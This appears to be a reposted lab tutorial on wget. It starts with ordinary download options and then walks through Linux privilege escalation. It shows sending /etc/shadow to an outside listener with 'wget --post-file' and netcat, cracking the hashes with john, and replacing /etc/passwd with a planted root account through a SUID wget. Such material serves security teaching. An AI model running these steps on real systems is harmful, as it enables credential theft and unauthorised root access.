![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-IzM8mG6bSqE/XP5rV7zh5pI/AAAAAAAAevg/XLfp6fG8vpsgGpaJh5pGfoU3WTJb4y44wCLcBGAs/s1600/2.png?w=687&ssl=1)
To overwrite documents to file: Here in the below image, we are showing how one can move the documents of the downloaded file to any other file. We will use the -O (uppercase) argument for this function.
Type the below-mentioned command for the same, in which I have download putty.exe and obtain the output inside raj.exe.
wget -O raj.exe
[To see content please register here]
1
wget -O raj.exe
[To see content please register here]
After completing half download I’m pausing my file by simply pressing ctrl + c to stop my downloading in mid of session just to explain “how we can retrieve or resume our downloading” if we have any network failure issue power cut or any other reasons that can stop our downloading process.
To resume any downloading process: As I have mentioned above if we have any issue or problems that can tend to fail in our downloading process by any mean then we can resume our uncompleted download by -c arguments. Find the below-mentioned command as per screenshot:
wget -c -O raj.exe
[To see content please register here]
1
wget -c -O raj.exe
[To see content please register here]
![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-0-sIe1xw6co/XP5rWW1Zf9I/AAAAAAAAevo/pns4w66CyvcQ2mVlQzwzA8LOU6JqxQnNwCLcBGAs/s1600/3.png?w=687&ssl=1)
To download multiple files simultaneously: Wget also allows the user to download multiple files simultaneously instead to download it one by one. Suppose we have any folder that contains multiple links and we want to download all the files together so we will use this command following by -i arguments.
Here I’m creating a file by the name of “link” which contains two links and I want to download both links together. Type the below-mentioned command for performing the same task:
cat link
wget -i link
1
2
cat link
wget -i link
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-riFLengT48c/XP5rWwE3C3I/AAAAAAAAevs/kMbnu7NLL94Cm_gzBrnXmwBMGrr-hRdKwCLcBGAs/s1600/4.png?w=687&ssl=1)
To turn off output: Whenever we want to turn off the output of any downloading process then we can use -q arguments for the same. This argument helps the user to download the file in the background by turning off its standard output i.e. downloading the file with complete silence.
We will use Wget command with -q argument for this as shown below.
wget -q
[To see content please register here]
1
wget -q
[To see content please register here]
There so many options inside wget but in this post, we have discussed very of them. Because our vision is to demonstrate privilege escalation by exploiting wget, therefore in the next phase you will learn how to exploit wget for escalating root shell.
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-pthwfl3T6i0/XP5rXOFK6EI/AAAAAAAAevw/RWce_BHWxt8vAlQaSd45VBt1xXOBGbJhgCLcBGAs/s1600/5.png?w=687&ssl=1)
Exploiting wget
Sudo Rights Lab setups for Privilege Escalation
Now we will set up our lab of Wget command with higher privilege i.e. with administrative rights. As we know the behavior of many commands get changed after getting higher privileges similarly, we will check for the Wget command that what impact it has after getting sudo rights and how we can use it further for privilege escalation.
Refer to this
[To see content please register here]
for more information about sudo rightsIt can be clearly understood by the below image in which I have created a local user (test) who possess all sudo rights as root and can perform all task as admin.
To add sudo right open etc/sudoers file and type following as user Privilege specification.
test ALL=(root) NOPASSWD: /usr/bin/Wget
1
test ALL=(root) NOPASSWD: /usr/bin/Wget
![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-exI2jh9ZUIg/XP5rXEChkkI/AAAAAAAAev0/J3OwCOTr1Q4YdLxclee7LyMQ2wpdYO1_wCLcBGAs/s1600/6.png?w=687&ssl=1)
Exploiting Sudo rights
Now we will start exploiting Wget service by taking the privilege of sudoer’s permission. Suppose we got the sessions of victim’s machine that tend us to have local user access of the targeted system through which we can escalate the root user rights.
Very first we will connect to the target machine with ssh, therefore, type following command to get access through local user login.
ssh [email protected]
1
ssh [email protected]
Then we look for sudo right of “test” user (if given) and found that user “test” can execute Wget command as “root” (since he has ALL user’s right) without a password.
sudo -l
1
sudo -l
Wget utilized the post-file option to send the content of any file. So, here we will use wget command to transfer the content of the /etc/shadow file.
Syntax: sudo /usr/bin/wget --post-file=<path of file> <Listening IP>
1
Syntax: sudo /usr/bin/wget --post-file=<path of file> <Listening IP>
Since post-file will transfer the content of shadow file to the listening IP therefore, we should turn on the listener on the destination machine. Hence open a new terminal and start the netcat listener for receiving the sent data from the source machine.
Type the below command:
sudo /user/bin/wget --post-file=/etc/shadow 192.168.1.17
1
sudo /user/bin/wget --post-file=/etc/shadow 192.168.1.17
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-sZ8bOp2BO6c/XP5rYOUUmjI/AAAAAAAAev4/d8j8VhXj71EWZ6zcvd4rCBwEfsYrjnF_gCLcBGAs/s1600/7.png?w=687&ssl=1)
As we had already turned on the netcat listener on port 80 to receive the content inside the “hash” file.
nc -lvp 80 > hash
1
nc -lvp 80 > hash
![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-ez6IOmbS4Nc/XP5rYOuGsyI/AAAAAAAAev8/5LJpYBl4EXEVmpGeLy4ZEtwDwRLZ61PqwCLcBGAs/s1600/8.png?w=687&ssl=1)
After this, we will acquire the content of the shadow file of the victim’s machine inside our hash file and then we will use john the ripper to crack the hash value.
Syntax: john <file name>
john hash
1
2
Syntax: john <file name>
john hash
Hmmm!! As we can observe from the given below image that it has cracked the password for user raj.
![[Image: 9.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-rPCXMm37wms/XP5rYSPa0GI/AAAAAAAAewA/dcdTD6fl_C8Ww03XaV207HzIdcczLyZJQCLcBGAs/s1600/9.png?w=687&ssl=1)
Since we got the credentials for the account of the user: raj so now, we can easily switch the user and will login as raj and further we tried to access root shell by switching.
su raj
sudo su
1
2
su raj
sudo su
And finally, we got the root access hence in this way we spawn the root shell by exploiting wget command.
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-EnrI0cdZYwc/XP5rThnkJiI/AAAAAAAAevI/YDXpHoc3NaApYCjrYkz9oCfFQ4HKh56gwCLcBGAs/s1600/10.png?w=687&ssl=1)
SUID Lab setups for Privilege Escalation
SUID: Set User ID is a type of permission that allows users to execute a file with the permissions of a specified user. Those files which have suid permissions run with higher privileges. Assume we are accessing the target system as a non-root user and we found suid bit enabled binaries, then those file/program/command can run with root privileges.
Read more from here:
[To see content please register here]
Now we are going to give SUID permission on wget so that a local user can take the privilege of wget as the root user.Hence type following for enabling SUID bit:
which wget
chmod u+s /usr/bin/wget
ls -al /usr/bin/wget
1
2
3
which wget
chmod u+s /usr/bin/wget
ls -al /usr/bin/wget
![[Image: 11.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-K_0VUnCZl84/XP5rTm50GpI/AAAAAAAAevA/-uDO00u08JoExhBYh0tGe19lAfyjEmhhQCLcBGAs/s1600/11.png?w=687&ssl=1)
Exploiting SUID
Now again compromise the target’s system and use find command to identify binaries having SUID permission.
find / -perm -u=s -type f 2>/dev/null
1
find / -perm -u=s -type f 2>/dev/null
So here we came to know that SUID bit is enabled for so many binary files, but we are interested in /usr/bin/wget.
![[Image: 12.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-XAg-bRav81w/XP5rUfaZzPI/AAAAAAAAevM/SW0GlhrVYtMryeN3fqRmD4H52kgbwGGZQCLcBGAs/s1600/12.png?w=687&ssl=1)
As we know, wget has suid permission and taking advantage of this right we will try to escalate the root privilege by injecting a new user inside the /etc/passwd file.
First, we will open our /etc/passwd file following by tail command which will read this file from its end and help us to know that the file ends with the user “test”.
![[Image: 16.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-IO83kNbn-4w/XP5rUm1FeWI/AAAAAAAAevQ/0vfW-Xvb8HEaJFG-7d3-aXoW6rqKS0p5wCLcBGAs/s1600/16.png?w=687&ssl=1)
Now we are creating the salt value of password for our new user and this will be done by using “openssl” following by the command as mentioned in the screenshot below.
openssl passwd -1 -salt ignite pass123
1
openssl passwd -1 -salt ignite pass123
And we will get our hash value something like this: “$1$ignite$3eTbJm980Hz.k1NTdNxe1”; copy it for further use.
![[Image: 17.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-JCXYUiEYipo/XP5rU2wfrLI/AAAAAAAAevU/q1B_eh1QXOQgFntuV1Ghb3T74zyglwHjQCLcBGAs/s1600/17.png?w=687&ssl=1)
On moving ahead for the completion of this task now I have copied the entire content of /etc/passwd file in our local machine and will edit a new record for the user “ignite” then paste the above-copied hash password in the record as shown below.
![[Image: 18.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-g7BbkgTsfyc/XP5rVfreQjI/AAAAAAAAevY/exmVpju8knU4ngz0pd5xqz8eBoIih7kEgCLcBGAs/s1600/18.png?w=687&ssl=1)
Name this file as passwd and run python HTTP server for transferring this file into victim’s machine.
python -m SimpleHTTPServer
1
python -m SimpleHTTPServer
![[Image: 19.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-339wnZVl0kk/XP5rVScSBcI/AAAAAAAAevc/UPi7kiJWKFEVsa4n4TU3sQp4pfBZVMMZQCLcBGAs/s1600/19.png?w=687&ssl=1)
Now we want to inject our modified passwd file inside /etc folder to replace the original passwd file. We will use wget with -O to download the passwd file from our machine (Kali Linux) inside a/etc directory which will overwrite the existing passwd file.
cd /etc
wget -O passwd
[To see content please register here]
1
2
cd /etc
wget -O passwd
[To see content please register here]
Now let’s switch to ignite that owns the root user’s privileges and access the root shell.
su ignite
password: pass123
id
1
2
3
su ignite
password: pass123
id
Hence you can notice from the given below image we have escalated the root privilege by abusing
SUID permission on wget.
![[Image: 20.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-NI0NK-2Sf-o/XP5rWB0aOzI/AAAAAAAAevk/DFJ8CSpu9bcLfU0tsBpfzj7lvaocrs76gCLcBGAs/s1600/20.png?w=687&ssl=1)